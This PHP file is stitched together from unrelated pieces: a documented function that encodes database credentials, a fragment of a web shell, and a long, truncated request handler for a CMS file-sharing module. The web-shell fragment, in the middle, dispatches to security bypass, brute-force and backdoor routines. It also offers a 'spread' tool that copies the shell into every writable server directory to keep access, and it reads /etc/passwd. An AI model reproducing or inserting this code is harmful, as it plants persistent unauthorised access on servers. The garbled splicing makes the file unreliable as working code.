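/**
 * Pack database connection settings into one encoded string.
 *
 * The settings are collected into an associative array, JSON-encoded and
 * passed to Encoder(). 'port' and 'charset' are added only when the caller
 * passes a value other than null.
 *
 * Security notes:
 *  - The returned string carries the database password. Encoder() is defined
 *    outside this block, so whether it encrypts with a key or only applies a
 *    reversible encoding cannot be told from here (TODO confirm). Until that
 *    is confirmed, treat the result as a secret: keep it out of logs, URLs,
 *    error pages and world-readable files.
 *  - json_encode() returns false on failure (for example when a value is not
 *    valid UTF-8). The original passed that false straight to Encoder(), which
 *    would yield a blob holding no usable credentials. This version fails
 *    closed, and the exception message deliberately contains no setting values.
 *
 * @param mixed $type     Stored under 'type'.
 * @param mixed $host     Stored under 'host'.
 * @param mixed $username Stored under 'username'.
 * @param mixed $password Stored under 'password'; never echoed or logged here.
 * @param mixed $database Stored under 'database'.
 * @param mixed $port     Optional; stored under 'port' when not null.
 * @param mixed $charset  Optional; stored under 'charset' when not null.
 *
 * @return mixed Whatever Encoder() returns for the JSON document.
 *
 * @throws \RuntimeException When the settings cannot be JSON-encoded.
 */
function createCode($type, $host, $username, $password, $database, $port = null, $charset = null)
{
    $code = array(
        'type' => $type,
        'host' => $host,
        'username' => $username,
        'password' => $password,
        'database' => $database,
    );

    if ($port !== null) {
        $code['port'] = $port;
    }

    if ($charset !== null) {
        $code['charset'] = $charset;
    }

    $json = json_encode($code);
    if ($json === false) {
        // Only the numeric JSON error code is reported; $code holds the password.
        throw new \RuntimeException(
            'createCode: connection settings could not be JSON-encoded (json error ' . json_last_error() . ')'
        );
    }

    return Encoder($json);
}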
case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION = array(); session_destroy(); echo "Logged out from MySQL.<br>"; break; case 'f': FileEditor(); break; case 'encode': Encoder(); break; case 'bypass': security_bypass(); break; case 'bf': brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if (!isset($_POST['spread_shell'])) { echo "<center><form action='?act=spread' method='post'>\n This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br>\n Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br>\n <input type='submit' value='Spread' name='spread_shell'>\n </form></center>"; } else { $s = 0;
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'listUrl') { $menu = Request('menu'); $page = Request('page'); $page = $this->IM->getPages($menu, $page); $oKey = Request('oKey'); $oKeyword = Request('oKeyword'); $oCategory = Request('oCategory'); $oSort = Request('oSort'); $keyword = Request('keyword'); $category = Request('category'); $sort = Request('sort'); $key = Request('key'); $keyword = Request('keyword'); $p = Request('p') ? Request('p') : 1; $queryString = 'menu=' . $page->menu . '&page=' . $page->page . '&keyword=' . $keyword . '&category=' . $category . '&sort=' . $sort . '&p=' . $p; if ($oKeyword != $keyword || $oCategory != $category || $oSort != $sort) { $p = 1; } $default = array(); if (strlen($keyword) == 0) { $default['keyword'] = ''; } if ($sort == 'update') { $default['sort'] = ''; } if (isset($page->context->config->category) == true && $page->context->config->category == $category) { $default['category'] = ''; } $url = $this->IM->getUrl($page->menu, $page->page, 'list', $p) . $this->IM->getQueryString($default, $queryString); $results->success = true; $results->url = $url; } if ($action == 'postWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->did = Request('did'); $values->menu = Request('menu'); $values->page = Request('page'); $values->category = Request('category'); $values->homepage = Request('homepage'); $values->license = Request('license') ? Request('license') : ($values->errors['license'] = $this->getLanguage('postWrite/help/license/error')); $values->price = Request('price') ? preg_match('/[1-9]+[0-9]*/', Request('price')) == true ? Request('price') : ($values->errors['price'] = $this->getLanguage('postWrite/help/price/error')) : 0; $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error')); $values->content = Request('content') ? 
Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); $values->dataroom = $this->getDataroom($values->did); if ($values->dataroom->use_category == 'USED') { if ($values->category == null || preg_match('/^[1-9]+[0-9]*$/', $values->category) == false) { $values->errors['category'] = $this->getLanguage('postWrite/help/category/error'); } } else { $values->category = 0; } if (isset($_FILES['logo']['tmp_name']) == true && $_FILES['logo']['tmp_name']) { $checkImage = getimagesize($_FILES['logo']['tmp_name']); if (in_array($checkImage[2], array(1, 2, 3)) == false) { $values->errors['logo'] = $this->getLanguage('postWrite/help/logo/error'); } } if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['category'] = $values->category; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['title'] = $values->title; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); $insert['homepage'] = $values->homepage; $insert['license'] = $values->license; $insert['price'] = $values->price; if ($values->idx == null) { $post = null; if ($this->checkPermission('write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } else { $oCategory = null; $reg_date = time(); $insert['reg_date'] = $reg_date; $insert['last_update'] = 0; $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = 
$this->db()->insert($this->table->post, $insert)->execute(); } $this->IM->setArticle('dataroom', $values->did, 'post', $values->idx, 0); $this->IM->getModule('member')->sendPoint(null, $values->dataroom->post_point, 'dataroom', 'post', array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->dataroom->post_exp, 'dataroom', 'post', array('idx' => $values->idx)); } else { $post = $this->getPost($values->idx); $oCategory = $post->category; $reg_date = $post->reg_date; if ($this->checkPermission('modify') == false && $post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute(); $this->IM->setArticle('dataroom', $values->did, 'post', $values->idx, $post->last_update); if ($post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($post->midx, 'dataroom', 'post_modify', $values->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null, 0, 'dataroom', 'post_modify', array('idx' => $values->idx)); } } if ($results->success == true) { if (isset($_FILES['logo']['tmp_name']) == true && $_FILES['logo']['tmp_name']) { $fileName = $_FILES['logo']['name']; $tempFileName = $this->IM->getModule('attachment')->getTempPath(true) . '/' . 
md5_file($_FILES['logo']['tmp_name']); if ($this->IM->getModule('attachment')->createThumbnail($_FILES['logo']['tmp_name'], $tempFileName, 500, 0, true) == true) { if ($post == null || $post->logo == 0) { $logoIdx = $this->IM->getModule('attachment')->fileSave($fileName, $tempFileName, 'dataroom', 'logo'); } else { $logoIdx = $this->IM->getModule('attachment')->fileReplace($post->logo, $fileName, $tempFileName); } $this->db()->update($this->table->post, array('logo' => $logoIdx))->where('idx', $values->idx)->execute(); $this->IM->getModule('attachment')->filePublish($logoIdx); } } for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->did, 'type' => 'POST', 'parent' => $values->idx))->execute(); } $this->IM->getModule('attachment')->filePublish($values->attachments[$i]); } if ($oCategory != 0 && $oCategory != $values->category) { $lastPost = $this->db()->select($this->table->post)->where('category', $oCategory)->orderBy('last_update', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->last_update : 0; $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $oCategory)->execute(); } if ($values->category != 0 && $oCategory != $values->category) { $lastPost = $this->db()->select($this->table->post)->where('category', $values->category)->orderBy('last_update', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? 
$lastPost[0]->last_update : 0; $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $values->category)->execute(); } $postnum = $this->db()->select($this->table->post)->where('did', $values->did)->count(); $this->db()->update($this->table->dataroom, array('postnum' => $postnum))->where('did', $values->did)->execute(); $page = $this->IM->getPages($values->menu, $values->page); if ($page->context->config == null) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, $post == null ? 'version' : 'view', $values->idx); } elseif ($page->context->config->category == $values->category) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, $post == null ? 'version' : 'view', $values->idx); } else { $redirectPage = $this->getPostPage($values->idx); $results->redirect = $this->IM->getUrl($redirectPage->menu, $redirectPage->page, $post == null ? 'version' : 'view', $values->idx); } } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'postDelete') { $values->idx = Request('idx'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('post', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'versionWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->parent = Request('parent'); $values->did = Request('did'); $values->menu = Request('menu'); $values->page = Request('page'); $values->version = preg_match('/^[0-9]+\\.[0-9]+(\\.[0-9]+)?$/', Request('version')) == true ? 
Request('version') : ($values->errors['version'] = $this->getLanguage('versionWrite/help/history/error')); $values->history = Request('history') ? Request('history') : ($values->errors['history'] = $this->getLanguage('versionWrite/help/history/error')); $values->dataroom = $this->getDataroom($values->did); $values->post = $this->getPost($values->parent); if (version_compare($values->post->last_version, $values->version, '>=') == true) { $values->errors['version'] = $this->getLanguage('versionWrite/help/version/lowVersion'); } if (isset($_FILES['file']['tmp_name']) == true && $_FILES['file']['tmp_name']) { if ($this->IM->getModule('attachment')->getFileMime($_FILES['file']['tmp_name']) != 'application/zip') { $errors['file'] = $this->getLanguage('versionWrite/help/file/notzip'); } } if (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['parent'] = $values->parent; $insert['version'] = $values->version; $insert['history'] = $values->history; if ($values->idx == null) { if ($this->checkPermission('write') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } else { $reg_date = time(); $insert['reg_date'] = $reg_date; $values->idx = $this->db()->insert($this->table->post_version, $insert)->execute(); $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->parent); } // Action Register } else { $oCategory = $post->category; $reg_date = $post->reg_date; if ($this->checkPermission('post_modify') == false && ($post->midx != 0 && $post->midx != $this->IM->getModule('member')->getLogged())) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($post->midx == 0) { if ($mHash->password_validate($values->password, $post->password) == false) { $results->success = false; $results->errors = array('password' 
=> $this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } if ($results->success == true) { if ($this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute(); } $insert['reg_date'] = $post['reg_date']; } if ($results->success == true) { if (isset($_FILES['file']['tmp_name']) == true && $_FILES['file']['tmp_name']) { $fileName = $_FILES['file']['name']; $fileIdx = $this->IM->getModule('attachment')->fileSave($fileName, $_FILES['file']['tmp_name'], 'dataroom', 'file'); $this->db()->update($this->table->post_version, array('file' => $fileIdx))->where('idx', $values->idx)->execute(); } $lastVersion = $this->db()->select($this->table->post_version)->where('parent', $values->parent)->orderBy('reg_date', 'desc')->getOne(); $this->db()->update($this->table->post, array('last_version' => $lastVersion->version, 'last_update' => $lastVersion->reg_date))->where('idx', $values->parent)->execute(); if ($values->post->category != 0) { $this->db()->update($this->table->category, array('last_post' => $lastVersion->reg_date))->where('idx', $values->post->category)->execute(); } $lastPost = $this->db()->select($this->table->post)->where('did', $values->did)->orderBy('last_update', 'desc')->getOne(); $this->db()->update($this->table->dataroom, array('last_post' => $lastPost->last_update))->where('did', $values->did)->execute(); $this->IM->setArticle('dataroom', $values->did, 'post', $values->post->idx, time()); $page = $this->IM->getPages($values->menu, $values->page); $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->parent); } } else { $results->success = false; $results->message = 
$this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'getQna') { $values->get = Request('get'); if ($values->get == 'page') { $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->qnalimit = $values->dataroom->qnalimit; $values->page = Request('page'); $values->qnas = $this->getQnaPage($values->parent, $values->page, $values->qnalimit); if ($values->page > 1 && count($values->qnas) == 0) { while ($values->page > 1) { $values->page = $values->page - 1; $values->qnas = $this->getMentPage($values->parent, $values->page, $values->qnalimit); if (count($values->qnas) > 0) { break; } } } if (count($values->qnas) > 0) { $results->page = $values->page; } } elseif ($values->get == 'idx') { $values->idx = Request('idx'); $qna = $this->db()->select($this->table->question)->where('idx', $values->idx)->getOne(); $values->dataroom = $this->getDataroom($qna->did); $values->qnalimit = $values->dataroom->qnalimit; $values->parent = $qna->parent; if ($qna != null) { $values->post = $this->getPost($values->parent); $prevCount = $this->db()->select($this->table->question)->where('parent', $qna->parent)->where('idx', $qna->idx, '>')->count(); $values->page = floor($prevCount / $values->qnalimit) + 1; $values->qnas = $this->getQnaPage($values->parent, $values->page, $values->qnalimit); $results->page = $values->page; } else { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('qnaList/empty') . '</div>'; } } if (count($values->qnas) == 0) { $results->page = null; $results->qnaHtml = '<div class="empty">' . $this->getLanguage('qnaList/empty') . 
'</div>'; } else { $results->qnaHtml = ''; for ($i = 0, $loop = count($values->qnas); $i < $loop; $i++) { $results->qnaHtml .= $this->getQnaItem($values->qnas[$i]); } } $results->success = true; $results->parent = $values->parent; if ($results->page != null) { $results->qnaCount = number_format($values->post->qna); } $results->pagination = $this->getQnaPagination($results->parent, $results->page); } if ($action == 'getQnaView') { $values->idx = Request('idx'); $results->success = true; $results->idx = $values->idx; $results->qnaHtml = $this->getQnaView($values->idx); } if ($action == 'getQnaWrite') { $values->parent = Request('parent') ? Request('parent') : null; $values->post = $this->getPost($values->parent); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('qna_write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/mypost'); } else { $results->success = true; $results->parent = $values->parent; $results->qnaHtml = $this->getQnaWrite($values->parent); } } if ($action == 'qnaWrite') { $values->errors = array(); $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->did = $values->dataroom->did; $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error')); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? 
Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); if (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['parent'] = $values->parent; $insert['title'] = $values->title; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('qna_write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/mypost'); } else { $insert['reg_date'] = time(); $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->question, $insert)->execute(); } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->did, 'type' => 'QUESTION', 'parent' => $values->idx))->execute(); } } $qnanum = $this->db()->select($this->table->question)->where('parent', $values->parent)->count(); $this->db()->update($this->table->post, array('qna' => $qnanum))->where('idx', $values->parent)->execute(); $this->IM->getModule('push')->sendPush($values->post->midx, 'dataroom', 'question', $values->post->idx, array('from' => $this->IM->getModule('member')->getLogged(), 'idx' => 
$values->idx)); $results->idx = $values->idx; } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'qnaAnswer') { $values->errors = array(); $values->parent = Request('parent'); $values->question = $this->db()->select($this->table->question)->where('idx', $values->parent)->getOne(); $values->post = $this->getPost($values->question->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->did = $values->dataroom->did; $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); if (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['parent'] = $values->parent; $insert['content'] = $values->content; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('qna_answer') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($values->question->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/myquestion'); } else { $insert['reg_date'] = time(); $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->answer, $insert)->execute(); } if ($results->success == true) { 
for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->did, 'type' => 'ANSWER', 'parent' => $values->idx))->execute(); } } $this->db()->update($this->table->question, array('has_answer' => 'TRUE'))->where('idx', $values->parent)->execute(); $this->IM->getModule('push')->sendPush($values->question->midx, 'dataroom', 'answer', $values->question->idx, array('from' => $this->IM->getModule('member')->getLogged(), 'idx' => $values->idx)); $results->idx = $values->idx; $results->parent = $values->parent; } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'getMent') { $values->get = Request('get'); if ($values->get == 'page') { $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->mentlimit = $values->dataroom->mentlimit; $values->page = Request('page'); $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); if ($values->page > 1 && count($values->ments) == 0) { while ($values->page > 1) { $values->page = $values->page - 1; $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); if (count($values->ments) > 0) { break; } } } if (count($values->ments) == 0) { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . 
'</div>'; } else { $results->page = $values->page; } } elseif ($values->get == 'idx') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); $values->parent = $ment->parent; if ($ment != null) { $values->page = $this->getMentPosition($values->idx); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->mentlimit = $values->dataroom->mentlimit; $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); $results->page = $values->page; } else { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . '</div>'; } } $results->success = true; $results->parent = $values->parent; $results->mentCount = number_format($values->post->ment); $results->idxs = array(); $results->ments = array(); if (empty($values->mentHtml) == false) { $results->mentHtml = $values->mentHtml; } if ($results->page !== null) { for ($i = 0, $loop = count($values->ments); $i < $loop; $i++) { $results->ments[$i] = array('idx' => $values->ments[$i]->idx, 'modify_date' => $values->ments[$i]->modify_date, 'html' => $this->getMentItem($values->ments[$i])); $results->idxs[$i] = $values->ments[$i]->idx; } } $results->pagination = $this->getMentPagination($results->parent, $results->page); } if ($action == 'getMentDepth') { $idx = Request('idx'); $parent = $this->getMent($idx); if ($parent == null || $parent->is_delete == 'TRUE') { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($parent->depth >= 10) { $results->success = false; $results->message = $this->getLanguage('mentWrite/overdepth'); } else { $results->success = true; $results->depth = $parent->depth; $results->parent = $parent->parent; $results->source = $idx; } } if ($action == 'mentWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->source = Request('source'); $values->parent = Request('parent'); $values->post = 
$this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } if ($values->source) { $sourceData = $this->getMent($values->source); if ($sourceData == null) { $results->success = false; $results->message = $this->getLanguage('mentWrite/deleteSource'); } } $values->content = $this->encodeContent($values->content, $values->attachments); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('ment_write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif (empty($values->errors) == true) { $mHash = new Hash(); $insert = array(); $insert['did'] = $values->post->did; $insert['parent'] = $values->parent; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); if ($values->idx == null) { $insert['reg_date'] = time(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->ment, $insert)->execute(); if ($values->source) { $sourceData = $this->getMent($values->source); $head = $sourceData->head; $depth = $sourceData->depth + 1; $source = $sourceData->idx; if ($depth > 1) { $depthData = $this->db()->select($this->table->ment_depth)->where('head', $sourceData->head)->where('arrange', $sourceData->arrange, '>')->where('depth', $sourceData->depth, '<=')->orderBy('arrange', 'asc')->getOne(); if ($depthData == null) { $arrange = $values->idx; } else { $arrange = 
$depthData->arrange; $this->db()->update($this->table->ment_depth, array('arrange' => $this->db()->inc()))->where('head', $sourceData->head)->where('arrange', $arrange, '>=')->execute(); } } else { $arrange = $values->idx; } } else { $head = $values->idx; $arrange = $values->idx; $depth = 0; $source = 0; } $this->db()->insert($this->table->ment_depth, array('idx' => $values->idx, 'parent' => $values->parent, 'head' => $head, 'arrange' => $arrange, 'depth' => $depth, 'source' => $source))->execute(); if ($values->post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($values->post->midx, 'dataroom', 'ment', $values->post->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->sendPoint(null, $values->dataroom->ment_point, 'dataroom', 'ment', array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->dataroom->ment_exp, 'dataroom', 'ment', array('idx' => $values->idx)); if ($source != 0 && $sourceData->midx != 0 && $sourceData->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($sourceData->midx, 'dataroom', 'replyment', $values->post->idx, array('idx' => $values->idx, 'from' => $this->IM->getModule('member')->getLogged())); } $results->success = true; } else { $ment = $this->getMent($values->idx); $values->dataroom = $this->getDataroom($ment->did); if ($this->checkPermission('ment_modify') == false && ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged())) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($ment->midx == 0) { if ($mHash->password_validate($values->password, $ment->password) == false) { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } if ($results->success == true) { if 
($this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $insert['modify_date'] = time(); $this->db()->update($this->table->ment, $insert)->where('idx', $ment->idx)->execute(); if ($ment->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($ment->midx, 'dataroom', 'ment_modify', $values->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null, $values->dataroom->ment_exp, 'dataroom', 'ment_modify', array('idx' => $values->idx)); } $results->success = true; } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->post->did, 'type' => 'MENT', 'parent' => $values->idx))->execute(); } } $mentnum = $this->db()->select($this->table->ment)->where('parent', $values->parent)->where('is_delete', 'FALSE')->count(); $this->db()->update($this->table->post, array('ment' => $mentnum))->where('idx', $values->parent)->execute(); $this->IM->setArticle('dataroom', $values->dataroom->did, 'ment', $values->idx, time()); $results->message = $this->getLanguage('mentWrite/success'); $results->idx = $values->idx; $results->parent = $values->parent; $results->page = $this->getMentPosition($values->idx); } } elseif (count($values->errors) > 0) { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'mentModify') { $values->idx = Request('idx'); $values->password = Request('password'); $ment = $this->getMent($values->idx); if ($ment == null) { 
$results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_modify') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $ment->content = $this->getArticleContent($ment->content); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $ment->attachment = Encoder(json_encode($attachments)); $results->data = $ment; } } if ($action == 'mentDelete') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('ment', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'downloadConfirm') { $values->idx = Request('idx'); $values->version = Request('version'); $values->confirm = Request('confirm'); $values->post = $this->getPost($values->idx); $results->success = true; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('download') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { if ($values->version == 'latest') { $values->post_version = $this->db()->select($this->table->post_version)->where('parent', 
$values->idx)->orderBy('reg_date', 'desc')->getOne(); } else { $values->post_version = $this->db()->select($this->table->post_version)->where('parent', $values->idx)->where('version', $values->version)->getOne(); } if ($values->post_version == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->downloadUrl = $this->IM->getProcessUrl('dataroom', 'download', array('idx' => $values->idx, 'version' => $values->post_version->version)); } else { $values->purchase = $this->db()->select($this->table->purchase)->where('parent', $values->idx)->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($values->purchase == null) { if ($values->confirm == 'TRUE') { $price = $values->post->price; if ($price == 0 || $this->IM->getModule('member')->sendPoint(null, $price * -1, 'dataroom', 'purchase', array('idx' => $values->idx)) == true) { $this->db()->insert($this->table->purchase, array('parent' => $values->idx, 'midx' => $this->IM->getModule('member')->getLogged(), 'price' => $price, 'reg_date' => time()))->execute(); if ($price > 0) { $this->IM->getModule('member')->sendPoint($values->post->midx, round($price * 0.7), 'dataroom', 'sale', array('idx' => $values->idx), true); } $results->success = true; $results->downloadUrl = $this->IM->getProcessUrl('dataroom', 'download', array('idx' => $values->idx, 'version' => $values->post_version->version)); $this->IM->getModule('member')->addActivity(null, 0, 'dataroom', 'purchase', array('idx' => $values->idx)); } else { $results->success = false; $results->message = $this->getLanguage('error/notEnoughPoint'); } } else { $results->success = true; $results->modalHtml = $this->getDownload($values->idx, $values->post_version->version); } } else { $results->success = true; $results->downloadUrl = $this->IM->getProcessUrl('dataroom', 'download', array('idx' => 
